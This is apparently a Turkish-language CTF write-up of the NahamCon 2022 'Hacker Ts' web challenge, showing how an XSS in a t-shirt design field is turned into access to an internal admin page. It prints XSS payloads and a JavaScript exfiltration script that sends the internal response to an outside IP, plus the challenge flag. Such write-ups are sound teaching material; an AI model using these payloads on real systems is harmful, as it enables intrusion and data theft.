---
layout: post
title: "Nahamcon 2022 Web Soruları - Hacker Ts"
tags: [ctf, nahamcon, web]
---

![](/assets/img/ctf/nahamcon2022/hackerts/banner_hackerts.png)

CTF Linki: [https://ctf.nahamcon.com/challenges](https://ctf.nahamcon.com/challenges)

**Kategori:** Cross Site Scripting (XSS)

TLDR; Uygulamada XSS zafiyeti var. Internaldan erişilebilen bir servise erişebilmemize imkan tanıyor. Bu sayede flag okunabiliyor.

## Adimlar

Uygulamaya giriş yaptığımızda bizi aşağıdaki ekran karşılıyor. Kendi dizaynımızı oluşturmak için bizden bir girdi bekliyor.

![01](/assets/img/ctf/nahamcon2022/hackerts/hackerts-01.png)

mnykmct yazarak gönderiyorum ve t-shirtün üzerine basıldığını görüyorum.

![02](/assets/img/ctf/nahamcon2022/hackerts/hackerts-02.png)

Zafiyet araştırmasına girişmeden önce uygulamadaki diğer kısımlara bakıyorum. İlk resimde de görüldüğü üzere sağ üstte bir Admin linki var. Linke gitmeye çalıştığımda aşağıdaki gibi bir uyarı alıyorum.

![03](/assets/img/ctf/nahamcon2022/hackerts/hackerts-03.png)

`X-Forwarded-For: 127.0.0.1` gibi headerlarla birlikte requesti tekrar tekrar gönderdim fakat bir sonuç alamadım. Internalda çalışan bir servisten yardım almam gerekiyor.

Uygulamanın işleyişini ve sorunun bizden beklentisini anladıktan sonra servisleri manipüle etmeye çalıştım. Bir kaç denemeden sonra text alanında XSS zafiyeti olduğunu keşfettim. T-shirt farklı bir servis tarafından üretildiği için XSS orada tetikleniyordu. Bu sayede internal servislere erişebilmemize imkan tanıyordu.

Uygulamaya `<img src="http://localhost:5000/admin">` payloadını gönderdiğimde a'nın yanında küçük bir kutucuk çıktığını gördüm. İstek gidiyordu ama ortada benim görebileceğim bir veri yoktu.

![04](/assets/img/ctf/nahamcon2022/hackerts/hackerts-04.png)

Normalde iframe injection ile de sayfa geliyormuş fakat o ara ben bunu farkedemedim. Elimin altında çalışan güzel bir VPS vardı ve hemen yardımıma koştu.

VPSde bir http server başlattım ve index.js dosyasına aşağıdaki gibi scriptimi yazdım.

```javascript
function httpGet(theUrl) {
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open( "GET", theUrl, false );
    xmlHttp.send( null );
    return xmlHttp.responseText;
}

response = httpGet('http://localhost:5000/admin')
httpGet('http://159.89.17.34:8082/hello' + response)
```

Script gidip localhost'a istek atacak ve bana bu isteğin cevabını dönecek.

XSS zafiyetinin olduğu yere de `<script src="http://159.89.17.34:8082/index.js"></script>` payloadını gönderdim.

![06](/assets/img/ctf/nahamcon2022/hackerts/hackerts-06.png)

Her şey beklendiği gibi çalıştı ve uygulama bizim dosyamızı çekti. Ardından internal servise istek atarak bize cevabını döndü.

![07](/assets/img/ctf/nahamcon2022/hackerts/hackerts-07.png)

Dönen cevap URL encoded oldugu icin başta flagi tam göremedim. CyberChef'in yardımıyla decode ettim.

![08](/assets/img/ctf/nahamcon2022/hackerts/hackerts-08.png)

**FLAG:** `flag{461e2452088eb397b6138a5934af6231}`
